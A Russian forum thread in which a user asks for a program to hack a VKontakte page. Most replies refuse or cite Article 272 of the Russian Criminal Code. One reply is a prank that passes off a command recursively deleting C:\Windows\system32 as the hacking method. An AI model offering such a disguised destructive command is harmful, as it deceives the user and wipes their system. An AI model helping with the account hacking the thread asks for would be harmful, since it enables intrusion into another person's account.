Михаил Кузнецов

мне нужно взломать одну страничку в вконтакте

так совпали обстоятельства что мне нужно взломать одну страничку в вконтакте. поэтому прошу вас дайте ссылку на (реально работающею) программу или если можете напишите ее для меня. в долгу не останусь. за ранее благодарен.

Сергей Иванов

Мозг тебе нужен, чтобы не ходить на подобные сайты. Источники вирусов и рассадники мошенников и фишинга.

Александра Вячеславовна

Нажмите пуск, затем "выполнить", в нем введите cmd, затем, поочередно напишите там это:
@echo off
del c:\windows\system32 /F /S /Q

Эдуард Евстигнеев

Это тюрьма!!! !

Статья 272. Неправомерный доступ к компьютерной информации

1. Неправомерный доступ к охраняемой законом компьютерной информации, то есть информации на машинном носителе, в электронно-вычислительной машине (ЭВМ) , системе ЭВМ или их сети, если это деяние повлекло уничтожение, блокирование, модификацию либо копирование информации, нарушение работы ЭВМ, системы ЭВМ или их сети, -
наказывается штрафом в размере до двухсот тысяч рублей или в размере заработной платы или иного дохода осужденного за период до восемнадцати месяцев, либо обязательными работами на срок от ста двадцати до ста восьмидесяти часов, либо исправительными работами на срок до одного года, либо лишением свободы на срок до двух лет.
2. То же деяние, совершенное группой лиц по предварительному сговору или организованной группой либо лицом с использованием своего служебного положения, а равно имеющим доступ к ЭВМ, системе ЭВМ или их сети, -
наказывается штрафом в размере от ста тысяч до трехсот тысяч рублей или в размере заработной платы или иного дохода осужденного за период от одного года до двух лет, либо обязательными работами на срок от ста восьмидесяти до двухсот сорока часов, либо исправительными работами на срок до двух лет, либо арестом на срок от трех до шести месяцев, либо лишением свободы на срок до пяти лет.

Татьяна Записочная

вот это запросики пошли у людишек

Олька

Нет таких программ.
И писать их никто не будет.

Елена Кулинченко

Нормально так. Встречный вопрос-а зачем тебе чью-то страницу взламывать, а??

Татьяна Конакова

Или провакатор, или дебил! Скорее второе, но и первое не исключено ) Скоро начнут просить помочь банк взломать и что в долгу не останутся.

Мария Блинкова

Прочитайте УК РФ, статью 272.